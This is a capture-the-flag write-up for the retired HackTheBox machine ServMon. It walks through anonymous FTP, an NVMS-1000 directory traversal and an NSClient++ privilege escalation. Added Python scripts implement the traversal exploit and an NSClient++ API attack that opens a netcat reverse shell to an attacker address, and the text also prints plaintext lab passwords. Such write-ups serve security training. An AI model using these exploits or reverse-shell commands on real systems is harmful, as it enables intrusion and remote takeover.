ServMon is an Easy Windows box created by dmw0ng. It was released on April 11th, 2020 and retired on June 20th, 2020. The users rated the difficulty 4.1/10 and gave an appreciation score of 2.1/5.
TL;DR
We access an FTP server anonymously and find a note about a password file in nathan's home directory. A directory traversal/arbitrary file read vulnerability in an NVMS-1000 instance lets us read that file and recover nadine's password. We log in through SSH to retrieve the user flag. Another website exposes an NSClient++ instance; we read its admin password from the configuration file, then exploit a known authenticated privilege escalation vulnerability to get the root flag.
Reconnaissance & Enumeration
Open Ports
An NMAP scan shows the following (partial) output:
$ sudo nmap -sS -sV -p- 10.10.10.184

| PORT | STATE | SERVICE | VERSION |
|---|---|---|---|
| 21/tcp | open | ftp | Microsoft ftpd |
| 22/tcp | open | ssh | OpenSSH for_Windows_7.7 (protocol 2.0) |
| 80/tcp | open | http | |
| 135/tcp | open | msrpc | Microsoft Windows RPC |
| 139/tcp | open | netbios-ssn | Microsoft Windows netbios-ssn |
| 445/tcp | open | microsoft-ds? | |
| 5040/tcp | open | unknown | |
| 5666/tcp | open | nrpe? | |
| 6063/tcp | open | x11? | |
| 6699/tcp | open | napster? | |
| 7680/tcp | open | pando-pub? | |
| 8443/tcp | open | tcpwrapped | |
We discover:
- a Microsoft FTP server and an OpenSSH server,
- 2 websites, on ports 80 and 8443,
- SMB/RPC and several other, less common, open ports.
Web discovery — 80
We access the login page of a network surveillance management software called NVMS-1000 [1]:
There is a known directory traversal vulnerability in this product [2]. However, we do not know which version(s) are affected.
A Nikto scan and a directory/file brute-force do not reveal much more.
Web discovery — 8443
Here we have access to an NSClient++ web application [3]:
This is a monitoring agent originally created to work with Nagios. Version 0.5.2.35 has a known authenticated privilege escalation vulnerability [4]. Loading the page required launching the browser with the `--ignore-certificate-errors` flag.
FTP
Anonymous login is enabled and we can access a `Users` folder that contains the folders `Nadine` and `Nathan`. The `Confidential.txt` file in the `Nadine` folder contains the following message:
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
And the `Notes to do.txt` file in the `Nathan` folder shows:
- Change the password for NVMS - Complete
- Lock down the NSClient Access - Complete
- Upload the passwords
- Remove public access to NVMS
- Place the secret files in SharePoint
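Pulling the whole anonymous FTP tree by hand is tedious once there is more than one folder. The script below is an added example (mine, not from the write-up): it logs in anonymously, parses the MS-DOS style `LIST` output that Microsoft ftpd emits by default, recurses into directories and keeps every small file in memory so the notes can be read offline. The sample listing lines are constructed for the parser test, and the host, size limit and anonymous e-mail are assumptions.

```python
import re
from ftplib import FTP

# Microsoft ftpd lists directories in MS-DOS style, one entry per line.
# Constructed sample lines (not captured from the box) used to exercise the parser:
SAMPLE_LISTING = [
    "02-28-20  06:19PM       <DIR>          Nadine",
    "02-28-20  06:19PM       <DIR>          Nathan",
    "02-28-20  06:28PM                  174 Confidential.txt",
]

_MSDOS_LINE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2}[AP]M)\s+"
    r"(?P<size><DIR>|\d+)\s+(?P<name>.+)$"
)


def parse_msdos_listing(lines):
    """Return (name, is_dir, size) tuples from MS-DOS style LIST output."""
    entries = []
    for line in lines:
        m = _MSDOS_LINE.match(line.rstrip())
        if not m:
            continue  # banner or unexpected line: skip it rather than crash
        is_dir = m.group("size") == "<DIR>"
        size = 0 if is_dir else int(m.group("size"))
        entries.append((m.group("name"), is_dir, size))
    return entries


def walk_ftp(ftp, path="/", max_file_size=1_000_000):
    """Recursively list the tree under `path` and return {path: bytes} for small files."""
    found = {}
    lines = []
    ftp.cwd(path)
    ftp.retrlines("LIST", lines.append)
    for name, is_dir, size in parse_msdos_listing(lines):
        full = path.rstrip("/") + "/" + name
        if is_dir:
            found.update(walk_ftp(ftp, full, max_file_size))
            ftp.cwd(path)  # recursion changed the working directory; come back
        elif size <= max_file_size:  # do not pull large binaries by accident
            chunks = []
            ftp.retrbinary("RETR " + full, chunks.append)
            found[full] = b"".join(chunks)
    return found


def dump_anonymous(host, user="anonymous", password="anonymous@example.com"):
    """Log in anonymously and mirror every small file into memory."""
    with FTP(host, timeout=10) as ftp:
        ftp.login(user, password)
        return walk_ftp(ftp)


if __name__ == "__main__":
    for path, data in dump_anonymous("10.10.10.184").items():  # box address from the scan above
        print(f"== {path} ({len(data)} bytes)")
        print(data.decode("utf-8", errors="replace"))
```

Servers configured for UNIX-style listings need a different regex; checking the first `LIST` line before parsing avoids silently returning an empty tree.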
SMB
SMB requires authentication and we don't have any credentials at this point.
Gaining Access
We know that there may be a `Passwords.txt` file on nathan's Desktop. We can try to exploit the directory traversal/arbitrary file read vulnerability [2] to read it. Using the payload of the documented exploit as-is does not work:
With some encoding, however, the server returns `win.ini`:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Next, we fetch the password file, as we know its path from the note:
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
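The two reads above (`win.ini` as a canary, then `Passwords.txt`) can be scripted. This is an added example of my own, not the exploit-db code: it builds the traversal path either as in the public exploit or with every `../` percent-encoded, and sends it with `http.client`, which forwards the request line verbatim (browsers and curl collapse `../` before sending, which is one reason the plain payload can appear not to work). The write-up does not say which encoding it used, so percent-encoding is an assumption here, as are the host, the depth of 12 and the `[fonts]`/`[extensions]` check.

```python
import http.client

DEPTH = 12  # as many '../' as the public exploit uses; extra levels are harmless at the drive root


def percent_encode(s):
    """Percent-encode every character, so '../' becomes '%2e%2e%2f'."""
    return "".join(f"%{ord(c):02x}" for c in s)


def traversal_path(target, encoded=False):
    """Request path for `target`, given relative to the drive root (e.g. 'windows/win.ini').
    encoded=False reproduces the exploit-db payload; encoded=True percent-encodes each
    dot-dot-slash segment (assumed here to be the encoding that gets past the filter)."""
    segment = percent_encode("../") if encoded else "../"
    return "/" + segment * DEPTH + target


def looks_like_win_ini(body):
    """Cheap check that the body is really win.ini and not an error page."""
    return b"[fonts]" in body and b"[extensions]" in body


def fetch(host, port, path, timeout=10):
    """Send the request line exactly as built: http.client does not normalise '../'."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def read_file(host, port, target):
    """Try the plain payload first, then the encoded one; return the first 200 body, else None."""
    for encoded in (False, True):
        status, body = fetch(host, port, traversal_path(target, encoded))
        if status == 200 and body:
            return body
    return None


if __name__ == "__main__":
    HOST, PORT = "10.10.10.184", 80  # box address from the scan above
    ini = read_file(HOST, PORT, "windows/win.ini")
    print("win.ini readable:", ini is not None and looks_like_win_ini(ini))
    pw = read_file(HOST, PORT, "Users/Nathan/Desktop/Passwords.txt")
    if pw:
        print(pw.decode(errors="replace"))
```

Reading `win.ini` first matters: it exists on every Windows install, so a failure there points at the payload or the filter, while a failure on `Passwords.txt` may simply mean the path is wrong.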
We can store those passwords in a wordlist and test them against the 2 users we know:
We get nadine's password, which we can use to log in through SSH and to get the user flag:
Local Reconnaissance & Enumeration
According to the NSClient++ exploit description [4], there are 2 ways to retrieve the password:
- from its configuration file:
nadine@SERVMON c:\Program Files\NSClient++>type nsclient.ini
[…]
; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1
[…]
- by using the client binary `nscp.exe`:
nadine@SERVMON c:\Program Files\NSClient++>nscp.exe web --password --display
Current password: ew2x6SsGTxjRwXOT
But when we use it on the web interface, we are still not allowed in. This is probably due to the `allowed hosts` setting, which only accepts access from `127.0.0.1`.
Privilege Escalation
Let's try through an SSH tunnel, so that our requests reach NSClient++ from localhost on the box:
Then we browse https://localhost:8843… but we can't reach it. By pinging `localhost` on the box, we see that it resolves to the IPv6 loopback address `::1`, while the `allowed hosts` setting only lists `127.0.0.1`. We retry, forwarding to `127.0.0.1` instead:
This time we reach the website and can log in… but the whole page is painfully slow:
We can now exploit the known privilege escalation vulnerability [4]. The exploit requires 2 modules to be enabled, `CheckExternalScripts` and `Scheduler`, and we can check that they already are. Then we follow these steps:
- copy Netcat to the server and start a listener locally:
$ nc -lnvp 1234
- modify the settings of the `CheckExternalScripts` module so that it runs a Netcat reverse shell:
- reload the module and wait for the callback:
Click once to unload it and once more to re-load it, which triggers the reverse shell:
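The same result can be obtained without clicking through the slow web UI. The script below is an added example of my own, not the write-up's method nor the exploit-db code: instead of editing the `CheckExternalScripts` settings and reloading the module, it registers a batch script through the NSClient++ REST API and asks the agent to execute it. It is sent through the SSH tunnel from the previous section (local port 8843 forwarded to `127.0.0.1:8443` on the box) so that the `allowed hosts = 127.0.0.1` check passes. The API routes (`PUT /api/v1/scripts/ext/scripts/<file>`, `GET /api/v1/queries/<command>/commands/execute`, `password` header) and the rule that the command name is the script file name without its extension are my recollection of the 0.5.x API and should be checked against the NSClient++ documentation; the attacker address, the `C:\Temp\nc.exe` path and the script name are placeholders.

```python
import http.client
import os
import ssl
from urllib.parse import quote


def reverse_shell_bat(attacker_ip, attacker_port, nc_path=r"C:\Temp\nc.exe"):
    """Batch script for NSClient++ to run. nc.exe must already be on the box (the write-up
    copies it there); nc_path and the attacker address are placeholders."""
    return f'@echo off\r\n"{nc_path}" {attacker_ip} {attacker_port} -e cmd.exe\r\n'


def api_paths(script_file):
    """(upload path, execute path) for a script file. Assumed 0.5.x API layout: the
    command registered for scripts/<file> is named after the file without extension."""
    command = os.path.splitext(script_file)[0]
    return (
        f"/api/v1/scripts/ext/scripts/{quote(script_file)}",
        f"/api/v1/queries/{quote(command)}/commands/execute",
    )


class NsclientApi:
    def __init__(self, host, port, password, timeout=60):
        self.host, self.port, self.password, self.timeout = host, port, password, timeout
        self.ctx = ssl.create_default_context()
        self.ctx.check_hostname = False
        self.ctx.verify_mode = ssl.CERT_NONE  # self-signed certificate, cf. --ignore-certificate-errors

    def _call(self, method, path, body=None):
        conn = http.client.HTTPSConnection(self.host, self.port, context=self.ctx, timeout=self.timeout)
        try:
            # NSClient++ authenticates API calls with the web password in a 'password' header.
            conn.request(method, path, body=body, headers={"password": self.password})
            resp = conn.getresponse()
            return resp.status, resp.read().decode(errors="replace")
        finally:
            conn.close()

    def add_script(self, script_file, content):
        put_path, _ = api_paths(script_file)
        return self._call("PUT", put_path, content.encode())

    def execute(self, script_file):
        _, exec_path = api_paths(script_file)
        return self._call("GET", exec_path)


if __name__ == "__main__":
    # Local end of the SSH tunnel: 8843 on the attacker -> 127.0.0.1:8443 on the box.
    api = NsclientApi("127.0.0.1", 8843, "ew2x6SsGTxjRwXOT")
    script = reverse_shell_bat("10.10.14.2", 1234)  # placeholder attacker IP, port of the nc listener
    print(api.add_script("shell.bat", script))
    print(api.execute("shell.bat"))  # blocks while the script runs; the shell lands on nc -lnvp 1234
```

The execute call does not return while the reverse shell is alive, so run it in the background or accept that the client hangs; the box's slowness mentioned above also means generous timeouts.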
Conclusion
An easy box exploiting some basic public vulnerabilities. The only difficulty was the stability of the box when many users were trying to exploit it all at once. I think the bad score of this box was mainly due to that.
As usual, here are some takeaways:
- update your software, run it under dedicated service accounts, and don't expose it publicly unless needed,
- disable anonymous FTP login, or better, stop using FTP altogether: switch to FTPS, SFTP, or preferably a solution with 2FA.
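On the NSClient++ side, the `allowed hosts` restriction alone bought nothing once an attacker held a local account and could tunnel in, and the password was readable by any local user. The fragment below is an added hardening example, not a configuration from the page: the "before" part mirrors what the write-up found in `nsclient.ini` (module and key names as shown above), the "after" part disables the script execution surface and the web server when they are not needed. The `WEBServer` module name, the monitoring-server address and the ACL advice are assumptions of mine.

```ini
; --- before: what the box ran (keys as seen in nsclient.ini above) ---
[/modules]
; any authenticated web/API user can register and run scripts
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/default]
; loopback-only, but trivially satisfied through an SSH tunnel
allowed hosts = 127.0.0.1
; readable by every local user because of the file's permissions
password = ew2x6SsGTxjRwXOT

; --- after: added hardening example ---
[/modules]
; no script execution surface unless a check genuinely needs it
CheckExternalScripts = disabled
Scheduler = disabled
; keep the web UI/API off when the monitoring server only talks NRPE/NSCA
WEBServer = disabled

[/settings/default]
; only the monitoring server (placeholder address), never a loopback catch-all
allowed hosts = 10.0.0.5
; long random secret; also restrict nsclient.ini to Administrators and the service account
password = <long random secret>
```

Even with the modules disabled, the agent still runs whatever checks it is configured with, so keep the service under a dedicated low-privilege account rather than SYSTEM.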
Resources
[1] NVMS-1000 Network Surveillance Management Software
http://en.tvt.net.cn/products/188.html
[2] NVMS-1000 Directory Traversal
https://www.exploit-db.com/exploits/47774
[3] NSClient++
https://nsclient.org/
[4] NSClient++ authenticated privilege escalation vulnerability
https://www.exploit-db.com/exploits/46802